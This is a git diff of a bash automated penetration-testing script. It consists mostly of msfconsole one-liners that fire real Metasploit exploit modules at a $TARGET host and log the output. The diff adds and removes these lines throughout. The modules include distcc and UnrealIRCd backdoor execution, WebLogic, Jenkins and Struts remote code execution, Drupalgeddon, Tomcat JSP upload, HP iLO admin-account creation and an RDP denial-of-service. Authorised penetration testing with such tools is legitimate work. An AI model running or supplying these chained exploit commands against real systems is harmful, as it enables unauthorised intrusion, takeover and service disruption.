"${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED RUNNING METASPLOIT MODULES $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use auxiliary/scanner/rdp/ms12_020_check; setg RHOSTS \"$TARGET\"; run; use auxiliary/dos/windows/rdp/ms12_020_maxchannelids; run; back; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port3389.txt + msfconsole -q -x "use auxiliary/scanner/rdp/ms12_020_check; setg RHOSTS \"$TARGET\"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port3389-ms12_020_check.txt + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port3389-ms12_020_check.raw > $LOOT_DIR/output/msf-$TARGET-port3389-ms12_020_check.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port3389-ms12_020_check.raw 2> /dev/null fi echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED RUNNING RDESKTOP CONNECTION $RESET" @@ -934,9 +916,9 @@ else echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED RUNNING METASPLOIT MODULES $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; use unix/misc/distcc_exec; run; exit;"| tee $LOOT_DIR/output/msf-$TARGET-port3632.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port3632.raw > $LOOT_DIR/output/msf-$TARGET-port3632.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port3632.raw 2> /dev/null + msfconsole -q -x "setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; use unix/misc/distcc_exec; run; exit;"| tee $LOOT_DIR/output/msf-$TARGET-port3632-distcc_exec.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port3632-distcc_exec.raw > $LOOT_DIR/output/msf-$TARGET-port3632-distcc_exec.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port3632-distcc_exec.raw 2> /dev/null fi fi @@ -955,9 +937,9 @@ else echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED RUNNING METASPLOIT MODULES $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use auxiliary/scanner/postgres/postgres_login; setg RHOSTS "$TARGET"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port5432.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port5432.raw > $LOOT_DIR/output/msf-$TARGET-port5432.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port5432.raw 2> /dev/null + msfconsole -q -x "use auxiliary/scanner/postgres/postgres_login; setg RHOSTS "$TARGET"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port5432-postgres_login.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port5432-postgres_login.raw > $LOOT_DIR/output/msf-$TARGET-port5432-postgres_login.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port5432-postgres_login.raw 2> /dev/null fi fi @@ -1001,9 +983,9 @@ else echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED RUNNING METASPLOIT MODULES $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use auxiliary/scanner/vnc/vnc_none_auth; setg RHOSTS \"$TARGET\"; run; back; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port5900.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port5900.raw > $LOOT_DIR/output/msf-$TARGET-port5900.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port5900.raw 2> /dev/null + msfconsole -q -x "use auxiliary/scanner/vnc/vnc_none_auth; setg RHOSTS \"$TARGET\"; run; back; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port5900-vnc_none_auth.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port5900-vnc_none_auth.raw > $LOOT_DIR/output/msf-$TARGET-port5900-vnc_none_auth.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port5900-vnc_none_auth.raw 2> /dev/null fi fi @@ -1022,9 +1004,9 @@ else echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED RUNNING METASPLOIT MODULES $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use auxiliary/scanner/couchdb/couchdb_enum; set RHOST "$TARGET"; run; exit;"| tee $LOOT_DIR/output/msf-$TARGET-port5984.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port5984.raw > $LOOT_DIR/output/msf-$TARGET-port5984.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port5984.raw 2> /dev/null + msfconsole -q -x "use auxiliary/scanner/couchdb/couchdb_enum; set RHOST "$TARGET"; run; exit;"| tee $LOOT_DIR/output/msf-$TARGET-port5984-couchdb_enum.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port5984-couchdb_enum.raw > $LOOT_DIR/output/msf-$TARGET-port5984-couchdb_enum.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port5984-couchdb_enum.raw 2> /dev/null fi fi @@ -1043,9 +1025,9 @@ else echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED RUNNING METASPLOIT MODULES $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use auxiliary/scanner/x11/open_x11; set RHOSTS "$TARGET"; exploit;" | tee $LOOT_DIR/output/msf-$TARGET-port6000.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port6000.raw > $LOOT_DIR/output/msf-$TARGET-port6000.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port6000.raw 2> /dev/null + msfconsole -q -x "use auxiliary/scanner/x11/open_x11; set RHOSTS "$TARGET"; exploit;" | tee $LOOT_DIR/output/msf-$TARGET-port6000-open_x11.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port6000-open_x11.raw > $LOOT_DIR/output/msf-$TARGET-port6000-open_x11.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port6000-open_x11.raw 2> /dev/null fi fi @@ -1064,9 +1046,9 @@ else echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED RUNNING METASPLOIT MODULES $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use unix/irc/unreal_ircd_3281_backdoor; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port6667.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port6667.raw > $LOOT_DIR/output/msf-$TARGET-port6667.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port6667.raw 2> /dev/null + msfconsole -q -x "use unix/irc/unreal_ircd_3281_backdoor; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port6667-unreal_ircd_3281_backdoor.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port6667-unreal_ircd_3281_backdoor.raw > $LOOT_DIR/output/msf-$TARGET-port6667-unreal_ircd_3281_backdoor.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port6667-unreal_ircd_3281_backdoor.raw 2> /dev/null fi fi @@ -1085,8 +1067,12 @@ else echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED RUNNING METASPLOIT MODULES $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use multi/http/oracle_weblogic_wsat_deserialization_rce; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set SSL true; run; exit;" - msfconsole -q -x "use exploit/linux/misc/jenkins_java_deserialize; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT 7001; set SSL true; run; exit;" + msfconsole -q -x "use multi/http/oracle_weblogic_wsat_deserialization_rce; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port7001-oracle_weblogic_wsat_deserialization_rce.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port7001-oracle_weblogic_wsat_deserialization_rce.raw > $LOOT_DIR/output/msf-$TARGET-port7001-oracle_weblogic_wsat_deserialization_rce.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port7001-oracle_weblogic_wsat_deserialization_rce.raw 2> /dev/null + msfconsole -q -x "use exploit/linux/misc/jenkins_java_deserialize; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT 7001; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port7001-jenkins_java_deserialize.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port7001-jenkins_java_deserialize.raw > $LOOT_DIR/output/msf-$TARGET-port7001-jenkins_java_deserialize.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port7001-jenkins_java_deserialize.raw 2> /dev/null fi fi @@ -1099,9 +1085,9 @@ else echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED RUNNING WEBMIN FILE DISCLOSURE EXPLOIT $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use auxiliary/admin/webmin/file_disclosure; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port10000.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port10000.raw > $LOOT_DIR/output/msf-$TARGET-port10000.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port10000.raw 2> /dev/null + msfconsole -q -x "use auxiliary/admin/webmin/file_disclosure; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port10000-file_disclosure.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port10000-file_disclosure.raw > $LOOT_DIR/output/msf-$TARGET-port10000-file_disclosure.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port10000-file_disclosure.raw 2> /dev/null fi fi @@ -1110,19 +1096,13 @@ then echo -e "$OKRED + -- --=[Port 16992 closed... skipping.$RESET" else echo -e "$OKORANGE + -- --=[Port 16992 opened... running tests...$RESET" - if [ "$NMAP_SCRIPTS" = "1" ]; then - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING NMAP SCRIPTS $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - nmap -A -sV -Pn -T5 --script=/usr/share/nmap/scripts/http-vuln-INTEL-SA-00075.nse -p 16992 $TARGET | tee $LOOT_DIR/output/nmap-$TARGET-port16992.txt - fi if [ "$METASPLOIT_EXPLOIT" = "1" ]; then echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED RUNNING INTEL AMT AUTH BYPASS EXPLOIT $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use auxiliary/scanner/http/intel_amt_digest_bypass; setg RHOSTS \"$TARGET\"; run; back; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port16992.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port16992.raw > $LOOT_DIR/output/msf-$TARGET-port16992.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port16992.raw 2> /dev/null + msfconsole -q -x "use auxiliary/scanner/http/intel_amt_digest_bypass; setg RHOSTS \"$TARGET\"; run; back; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port16992-intel_amt_digest_bypass.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port16992-intel_amt_digest_bypass.raw > $LOOT_DIR/output/msf-$TARGET-port16992-intel_amt_digest_bypass.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port16992-intel_amt_digest_bypass.raw 2> /dev/null fi fi @@ -1200,6 +1180,7 @@ source modes/fullportscan.sh source modes/bruteforce.sh rm -f $LOOT_DIR/.fuse_* 2> /dev/null +sort -u $LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null > $LOOT_DIR/ips/ips-all-sorted.txt 2> /dev/null echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED SCAN COMPLETE! $RESET" diff --git a/modes/normal_webporthttp.sh b/modes/normal_webporthttp.sh index 07fda6dc..243bb8e4 100644 --- a/modes/normal_webporthttp.sh +++ b/modes/normal_webporthttp.sh @@ -108,163 +108,8 @@ if [ "$MODE" = "web" ]; then fi cd $INSTALL_DIR if [ "$METASPLOIT_EXPLOIT" == "1" ]; then - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING HTTP PUT UPLOAD SCANNER $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use scanner/http/http_put; setg RHOSTS "$TARGET"; setg RPORT "80"; setg SSL false; run; set PATH /uploads/; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-http_put.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-http_put.raw > $LOOT_DIR/output/msf-$TARGET-port80-http_put.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port80-http_put.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "80"; setg SSL false; run; use scanner/http/webdav_website_content; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-webdav_website_content.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-webdav_website_content.raw > $LOOT_DIR/output/msf-$TARGET-port80-webdav_website_content.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port80-webdav_website_content.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING MICROSOFT IIS WEBDAV ScStoragePathFromUrl OVERFLOW $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/windows/iis/iis_webdav_scstoragepathfromurl; setg RHOST "$TARGET"; setg RPORT "80"; setg SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-iis_webdav_scstoragepathfromurl.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-iis_webdav_scstoragepathfromurl.raw > $LOOT_DIR/output/msf-$TARGET-port80-iis_webdav_scstoragepathfromurl.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port80-iis_webdav_scstoragepathfromurl.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING APACHE TOMCAT UTF8 TRAVERSAL EXPLOIT $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use admin/http/tomcat_utf8_traversal; setg RHOSTS "$TARGET"; setg RPORT "80"; set SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-tomcat_utf8_traversal.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-tomcat_utf8_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port80-tomcat_utf8_traversal.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port80-tomcat_utf8_traversal.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "80"; set SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-apache_optionsbleed.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-apache_optionsbleed.raw > $LOOT_DIR/output/msf-$TARGET-port80-apache_optionsbleed.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port80-apache_optionsbleed.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RPORT "80"; set SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-hp_ilo_create_admin_account.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-hp_ilo_create_admin_account.raw > $LOOT_DIR/output/msf-$TARGET-port80-hp_ilo_create_admin_account.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port80-hp_ilo_create_admin_account.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING ELASTICSEARCH DYNAMIC SCRIPT JAVA INJECTION EXPLOIT $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/elasticsearch/script_mvel_rce; setg RHOST "$TARGET"; setg RPORT "80"; set SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-script_mvel_rce.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-script_mvel_rce.raw > $LOOT_DIR/output/msf-$TARGET-port80-script_mvel_rce.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port80-script_mvel_rce.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING DRUPALGEDDON HTTP PARAMETER SQL INJECTION CVE-2014-3704 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/http/drupal_drupageddon; setg RHOST "$TARGET"; setg RPORT "80"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-drupal_drupageddon.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-drupal_drupageddon.raw > $LOOT_DIR/output/msf-$TARGET-port80-drupal_drupageddon.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port80-drupal_drupageddon.raw 2> /dev/null - - - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING GLASSFISH ADMIN TRAVERSAL EXPLOIT $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use scanner/http/glassfish_traversal; setg RHOSTS "$TARGET"; setg RPORT "80"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-glassfish_traversal.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-glassfish_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port80-glassfish_traversal.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port80-glassfish_traversal.raw 2> /dev/null - - - - - - - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING MS15-034 SYS MEMORY DUMP METASPLOIT EXPLOIT $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use auxiliary/scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS "$TARGET"; setg RPORT "80"; set WAIT 2; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-ms15_034_http_sys_memory_dump.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-ms15_034_http_sys_memory_dump.raw > $LOOT_DIR/output/msf-$TARGET-port80-ms15_034_http_sys_memory_dump.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port80-ms15_034_http_sys_memory_dump.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/windows/http/badblue_passthru; setg RHOST "$TARGET"; set RPORT 80; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-badblue_passthru.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-badblue_passthru.raw > $LOOT_DIR/output/msf-$TARGET-port80-badblue_passthru.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port80-badblue_passthru.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST "$TARGET"; set RPORT 80; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-php_cgi_arg_injection.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-php_cgi_arg_injection.raw > $LOOT_DIR/output/msf-$TARGET-port80-php_cgi_arg_injection.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port80-php_cgi_arg_injection.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOITS $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/htp/phpmyadmin_preg_replace; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-phpmyadmin_3522_backdoor.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-phpmyadmin_3522_backdoor.raw > $LOOT_DIR/output/msf-$TARGET-port80-phpmyadmin_3522_backdoor.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port80-phpmyadmin_3522_backdoor.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT CVE-2017-8917 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST "$TARGET"; set RPORT 80; set SSL false; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-joomla_comfields_sqli_rce.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-joomla_comfields_sqli_rce.raw > $LOOT_DIR/output/msf-$TARGET-port80-joomla_comfields_sqli_rce.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port80-joomla_comfields_sqli_rce.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING WORDPRESS REST API CONTENT INJECTION CVE-2017-5612 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use auxiliary/scanner/http/wordpress_content_injection; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set RPORT 80; set SSL false; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-wordpress_content_injection.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-wordpress_content_injection.raw > $LOOT_DIR/output/msf-$TARGET-port80-wordpress_content_injection.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port80-wordpress_content_injection.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING ORACLE WEBLOGIC WLS-WSAT DESERIALIZATION RCE CVE-2017-10271 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/http/oracle_weblogic_wsat_deserialization_rce; setg RHOST "$TARGET"; set RPORT 80; set SSL false; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-oracle_weblogic_wsat_deserialization_rce.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-oracle_weblogic_wsat_deserialization_rce.raw > $LOOT_DIR/output/msf-$TARGET-port80-oracle_weblogic_wsat_deserialization_rce.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port80-oracle_weblogic_wsat_deserialization_rce.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING APACHE STRUTS JAKARTA OGNL INJECTION CVE-2017-5638 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use multi/http/struts2_content_type_ognl; setg RHOST "$TARGET"; setg RPORT "80"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-struts2_content_type_ognl.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-struts2_content_type_ognl.raw > $LOOT_DIR/output/msf-$TARGET-port80-struts2_content_type_ognl.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port80-struts2_content_type_ognl.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING APACHE STRUTS 2 SHOWCASE OGNL RCE CVE-2017-9805 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/http/struts2_rest_xstream; setg RHOST "$TARGET"; setg RPORT "80"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-struts2_rest_xstream.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-struts2_rest_xstream.raw > $LOOT_DIR/output/msf-$TARGET-port80-struts2_rest_xstream.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port80-struts2_rest_xstream.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING APACHE STRUTS 2 REST XSTREAM RCE CVE-2017-9791 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/http/struts2_code_exec_showcase; setg RHOST "$TARGET"; setg RPORT "80"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-struts2_code_exec_showcase.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-struts2_code_exec_showcase.raw > $LOOT_DIR/output/msf-$TARGET-port80-struts2_code_exec_showcase.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port80-struts2_code_exec_showcase.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING APACHE TOMCAT CVE-2017-12617 RCE EXPLOIT $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/http/tomcat_jsp_upload_bypass; setg RHOST "$TARGET"; setg RPORT "80"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-tomcat_jsp_upload_bypass.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" 